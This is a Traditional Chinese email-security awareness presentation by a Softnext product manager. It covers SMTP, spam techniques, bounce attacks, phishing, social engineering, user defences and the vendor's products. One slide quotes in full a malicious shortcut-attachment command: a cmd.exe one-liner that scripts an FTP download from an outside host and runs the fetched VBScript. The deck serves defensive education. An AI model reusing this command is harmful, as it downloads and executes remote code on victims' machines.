電子郵件安全 Leo Dong 董一中 產品經理 中華數位科技股份有限公司 leo@softnext-inc.com

Agenda 電子郵件的技術與郵件運作 Spammer發送手法簡介 社交工程 Q & A

如何發送一封電子郵件 確認寄/收件人郵件網域 交涉(Negotiation) ESMTP的 處理程式 用戶身份認證 郵件本文的傳送 郵件傳送 交涉(Negotiation) 郵件本文的傳送 結束告知 Mail Server Client DNS Server 確認寄/收件人郵件網域 用戶身份認證

Email的組成 郵件表頭(Mail Header) 郵件主體(Mail Body)

Email詳細資料

Email的運作 MUA(Mail User Agent) MTA(Mail Transfer Agent) MDA(Mail Delivery Agent) MUA POP3 SMTP MTA MTA SMTP POP3 MUA

SMTP Protocol Step1 Step2 Step3 Step4 您好 您好 MTA MTA 我有信要寄過去 可以,有哪些信? 有這些信… MTA Step3 好,收到了 MTA 謝謝,再見 Step4 MTA 再見

電子郵件威脅 垃圾郵件(Spam) Web-based Email 使用問題 病毒/木馬/惡意程式 Mail Bomb 郵件炸彈 社交工程 & Phishing

什麼是垃圾郵件？ 垃圾郵件的定義： 未經允許大量寄送造成收信者困擾的郵件。 垃圾郵件的目的： 最原始常見的目的多半為商業行銷。 垃圾郵件與eDM： eDM應是收件者願意閱讀並不 會造成困擾的郵件。通常具 opt-in及opt –out機制

垃圾郵件緣起 1994年4月12日，一對居住在美國亞利桑那，專門承接移民事務的律師夫婦寫了一段Perl腳本的小程式，將他們的移民顧問服務廣告的電子郵件發送給大約6000個Usenet新聞群組用戶。這一事件即為垃圾郵件的起源，被稱為“綠卡”事件。（賽迪網） 垃圾郵件又稱為Spam（原意為肉罐頭），因為是從英國的Monty Python喜劇影集而來，有一幕為餐廳服務生唸菜單，全部都是跟Spam有關的菜色，因而被引用為討人厭的名詞。

垃圾郵件有何特性？ 大量發送 難以追蹤偵測 難辨真假 安全漏洞 主觀性 垃圾郵件最初以商業目的，為求效率常大量發送，亂槍打鳥。 為避免法律或相關責任，不論就信件內容亦或來源都常有偽造痕跡。 難辨真假 為吸引閱讀或是躲避內容過濾，部份垃圾信內容與正常信幾近無異。 安全漏洞 垃圾郵件可夾帶惡意的程式，隨收信軟體及安全措施而有不同安全威脅。 主觀性 每個人目的性不同，是否認可為垃圾郵件的灰色地帶大。

為什麼要發垃圾郵件？ 商業目的（類似eDM） 不合法商品（盜版、色情光碟、處方藥、毒品…等） 詐騙郵件（Phishing or Fraud） 試探性郵件（搜集帳號、試發、假回報。） 病毒郵件 製造輿論效果（黑函、假的金融消息…等）

垃圾郵件帶來的災害 流量的問題（Mail Server負載加重、網路頻寬壅塞、郵件儲存空間爆滿。） 耗費收件人的精神及時間 病毒帶來的資安風險 詐騙郵件減低對電子商務的信心（金融方面的詐騙比例最高） Anti-Spam的工作帶來額外的費用支出 帶動其它管道的Spam氾濫情形

垃圾郵件數量成長趨勢 根據Radicati group預估調查，到2009年全球垃圾信已佔整體Email流量的80% [單位--十億封] 14

垃圾郵件與一般郵件的差異 但是，只要SPAMMER願意，這些差異都可被精巧的偽裝避過 垃圾郵件可能沒有固定的發送郵件伺服器 垃圾郵件可能沒有合法的域名或MX記錄 正常郵件不太可能跨公司一信多發 垃圾郵件一定帶有需要被宣傳的特定內容或關鍵字句 垃圾郵件發送時，很有可能在發送時洩露考慮不週的痕跡，如Header的資訊，或是envelope出現不合理的情況。 但是，只要SPAMMER願意，這些差異都可被精巧的偽裝避過

垃圾郵件的發送 為了能成功的發送垃圾郵件，SPAMMER必須要注意下 列細節： 避免來源被追蹤 避免內容被偵測 發送有效率 要想辦法知道發送後的效益 社交工程

早期垃圾郵件的發送 租用線路自行架設伺服器 設定不當郵件伺服器 申請免費電子信箱 SPAM

近期垃圾郵件的發送 升級後的殭屍電腦 殭屍電腦 SPAM

垃圾信對企業信箱的攻擊模式 郵件炸彈發送模式 垃圾信業者一次發送大量的郵件，造成頻寬擁塞 連線服務中斷甚至Mail Server當機。 收不完的SPAM Mail \ _ / SPAM Mail Spammer Internet 正常郵件 Mail Server 主機當機 Mail無法收送 / _ \

垃圾信對企業信箱的攻擊模式 字典檔發送模式 透過字典檔以一封信夾帶多位收信人帳號，寄到企業的郵件伺服器。對郵件伺服器造成 系統負荷：Mail Server要核對收信帳號，再一一對內寄送 對內部不存在帳號，需對外發出user unknown系統訊息 Spam Mail Internet Spammer User unknown IP不存在

退信攻擊（一） 郵件伺服器A 郵件伺服器B B1 B2 B3 B4 A1 A2 A3 A4 冒充B1、B2…Bn，送信給A1、A2…An 退信 當SPAMMER冒充B1、B2…Bn，送信給A1、A2…An，若A1、A2…An真實存在，則SPAM會被成功寄送；若有任一收信者不存在，則會發生退信，並由郵件伺服器A退給遭到冒充的B1、B2…Bn。

退信攻擊（二） 當SPAMMER冒充B1、B2…Bn，送信給自行架設的郵件伺服器A1、A2…An ，則會發生退信，並由自行架設的郵件伺服器A1、A2…An退給遭到冒充的B1、B2…Bn。

退信攻擊（三） 郵件伺服器A A1 A2 A3 A4 冒充不存在的寄件者，送信給A1、A2…An 無法退信 產生大量信件佇列 冒充不存在的寄件者，送信給A1、A2…An，則會發生無法退信，郵件伺服器A會定時嘗試退信，並開始累積越來越多郵件佇列，造成郵件伺服器A效能低落。

近期Spammer與駭客合作模式 結合病毒感染,產生殭屍電腦發送站 運用電子郵件邏輯漏洞 破解網頁郵件的註冊驗證模式(Gmail, Hotmail, Yahoo..),偽裝合法網頁郵件發送spam To be Continue…

避免來源被追蹤 使用動態IP，自行架設SMTP Server進行垃圾郵件發送 租用網路管理較寬鬆國家的IP或網路進行垃圾郵件發送 透過設定不當的郵件伺服器進行垃圾郵件發送 透過遭受到入侵的殭屍電腦進行垃圾郵件發送 申請免費信箱發送垃圾郵件（如yahoo、hotmail） 透過公用賀卡或新聞發送系統發送垃圾郵件 1、根據以色列Commtouch公司在2006年12月公布的研究報告中指出，目前殭屍電腦的數量已經高達800萬，這些受控制的殭屍電腦群，可在短短的數小時內，派發出百萬封以上的垃圾郵件，前述所提及的圖片內嵌式垃圾郵件，更為全球帶來每天超過1.7TB的流量，殭屍電腦的威力實不可小覷。 25

利用Yahoo賀卡 發送系統派送垃圾郵件。

賀卡通知夾帶釣魚郵件 威脅解析 偽裝好友寄 來賀卡取信通知Email 3. 企圖感染 受害電腦 2. 點連結網址, 誤入陷阱 @ 成為垃圾信發送跳板 偽裝好友寄 來賀卡取信通知Email 下載木馬/惡意程式 3. 企圖感染 受害電腦 竊取帳號/資料 2. 點連結網址, 誤入陷阱

避免內容被偵測 避免使用明顯關鍵字 利用iFrame的方法，將垃圾郵件的內容導引至外部網頁 混雜入其他合法或不相關字眼 利用文字排版或圖片混雜等方式，錯亂內容掃描偵測 圖片式垃圾郵件

無行銷字眼，只是一篇 吳淡如的文章，然後要 你打電話才進行推銷！

無明顯關鍵字，並 混入不相關字眼，根據信末的宣傳語，很可能是透過免費信箱發送的垃圾郵件。

文字及內容混排

搭配HTML語法，造 成錯位排版。(視覺 上正確，但進行字串 掃瞄時會發生問題。)

圖片式垃圾郵件的災害 穿透力更高，不容易偵測。 數量約佔全體垃圾郵件的一半以上。 容易塞爆信箱 影響Push Mail的使用

圖片式垃圾郵件的一些範例

發送效率 垃圾郵件多半為程式化寄送（較手動發送有效率） 垃圾郵件發送的效率還包括了是否能成功送達，因此垃 圾郵件發送程式必須能： 發送程式發送後的垃圾郵件不可有破綻 分散輪發式 病毒式發送 不容易被追蹤 內容或格式多變 回饋資料（開信率、搜集有效帳號…等）

垃圾郵件發送效益 收件者回信、回電(或要求讀取回條) 垃圾郵件中的超連結點擊率 垃圾郵件發送後，沒有收到退信的情況 利用HTML圖片連結，暗中製造點擊數

同時利用iFrame及HTML 圖片連結，暗中製造點擊 數。

生活中的案例-Phishing email (Phishing) http://www.securecitibank.us

釣魚、詐騙事件逐漸增多 根據美國聯邦調查局及反網路釣魚工作小組（APWG）的調查統計，在美國網路釣魚詐騙的損失金額，從2001年的1,700萬美元，2002年的5,400萬美元，到了2003年，銀行與消費者的直接損失高達24億美元，而今年的統計數字還會持續增長。根據警政署統計，網路釣魚案件以每年五倍的速度成長，這還是有備案的數據，實際上數字還要更高。 警政署科技犯罪防治中心發現，從2006年12月開始，臺灣犯罪集團雇用中國大陸駭客，陸續架設、偽造臺灣知名企業的網站，包含10家假的網路銀行、2家航空公司、4家電腦科技公司、4家旅行社、1家人力銀行以及多個理財網站，總數超過50個。這些釣魚網站都申請註冊和原始正牌網站相似度極高的網路名稱，例如小寫的英文字母l與數字1，或者小寫的h和n等相似符號，駭客偽造這些企業網站的目的，主要是希望藉此取得金錢。 Yahoo!奇摩的買家近來陸續反映，收到假賣家提供的「假頁面」。頁面直接從Yahoo!奇摩網拍頁面複製而來，不同之處只在網域名稱。

Phishing Email 範例 雅虎拍賣上的結標信(台灣常見詐騙郵件的一種)

含有惡意指令的捷徑附件（一） %windir%\system32\cmd.exe /c echo set a=echo re>a.bat&echo %a%cv pnf pnf.vbs^>la>>a.bat&call a.bat&echo bye>>la&echo o>l&echo web.g03z.com>>l&echo aa33>>l&echo bb33>>l&type la>>l&ftp -s:l&start pnf.vbs&del la&del l a.bat 41

含有惡意指令的捷徑附件（二） 1.先種植 2.再發動 42

攻擊應用程式的附件（一） 43

攻擊應用程式的附件（二） 44

來自各國各有特色的垃圾郵件

社交工程 社交工程，英文為Social Engineering，是指以影響力或說服力來欺騙他人以獲得有用的資訊，這是近年來造成企業或個人極大威脅和損失的駭客攻擊手法。 社交工程利用人性容易相信而上當的弱點，避開了不容易破解的網路防火牆，選擇容易跨越的人性防火牆，只應用了簡單的溝通和欺騙技巧，便突破了企業的安全防護，而突破這些耗資千萬的層層安全防護，所花費的成本竟然只有一、兩通電話的費用。

教育部－社交工程相關規範 A, B級機關開啟率及點閱率應分別降至10%及6%以下. 所屬資安責任等級列為C, D級機關99年度惡意郵件開啟率, 點閱率應分別為35%及25%以下. 各機關人員每年至少需接受四小時資安講習, 其中至少有一小時的社交工程防制宣導講習. 5月底前辦理第一次演練, 9月底前辦理第二次演練.

收發電子郵件的風險－社交工程 社交工程是一種利用人性的弱點及無知，透過欺騙，取得被害人的信任，讓被害人作出對自己有利的舉動 常見的手法莫過於以電話、手機、簡訊等管道，設計騙人的劇本，讓被害人心甘情願的告知個人機密資訊或交付財物 在網路世界裏，最常使用的溝通管道就是電子郵件，因此社交工程和電子郵件的相互結盟，創造了新的詐騙手法 目前這樣的手法已大量被駭客拿來利用，「電子郵件加上社交工程加上木馬/後門程式」，駭客能夠取得的不僅僅是個人資訊，公務機密資料，甚至竊盜網路銀行帳號密碼、私自進行網路轉帳等行為

社交工程攻擊手法 製作釣魚相簿 瀏覽相簿 駭客 控制殭屍電腦/偷竊重要資料… 登入假網頁 3. 變更密碼, 在相簿中植入木馬 4.瀏覽相簿者PC被植入木馬 駭客 控制殭屍電腦/偷竊重要資料… 登入假網頁 2. 帳號密碼被竊 1. 偽造網路相簿寄 維護通知信

社交工程Email(時事相關)

社交工程Email(消費新聞)

社交工程Email(消費新聞)

社交工程Email(影劇八卦)

社交工程Email(科技趨勢)

社交工程Email(情色主旨)

社交工程Email(休閒娛樂主旨)

社交工程Email(養生保健主旨)

社交工程Email(養生保健主旨)

個人能做的防範－基本的資安條件 使用正版軟體，定時修補已知作業系統漏洞 防毒軟體很重要 (Avira, avast) 不要使用不明來源的軟體 不要瀏覽色情、賭博、不合法藥品、光碟販賣網站 收到可疑的Email通知，請不要直接由Email中所敘述的訊息回覆。 多利用ISP或其他免費提供的Anti-SPAM工具

個人能做的防範 不隨便外留Email Address 不隨便點垃圾郵件上的超連結 收件軟體應該做好正確設定 使用WebMail應該當心 多使用收信軟體、Webmail、及各種個人用，且能防範SPAM的機制或功能。

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 使用Webmail的話，不要去讀取垃圾郵件

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 收件軟體應該做好正確設定

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

個人能做的防範 設定以純文字模式開啟信件

公司簡介 中華數位科技秉持【We Secure Your Content】為服務理念，從email維運服務出發，到客戶整體內容安全保護。Softnext產品已導入2,000多家以上兩岸知名廠商 ，擁有領先的企業導入經驗及完善的技術支援能力 設立時間 2000年8月 網址 www.softnext-inc.com 員工數 總計90人 (台灣70人,海外20人) 銷售區域 台灣,中國,日本,東南亞,歐洲等 研發產品 SPAM SQR Mail SQR Expert Mail Archiving Expert Content SQR

Softnext－內容安全的最佳守護方案 Mail First Service Center Webmail/SMTP/POP3、Web/IM /P2P 全內容過濾紀錄 Core Switch Content SQR Firewall MSM MSM Email/Web/IM SPAM SQR Mail SQR Expert Mail Archiving Expert MySPAM MyMail Mail Server Mail Server 垃圾信過濾 病毒過濾 郵件稽核/政策化 管理 Email內容過濾 個人化郵件安 全管理服務 郵件歸檔及 復原 遵循法規

中華數位科技　董一中 leo@softnext-inc.com 02-25422526#251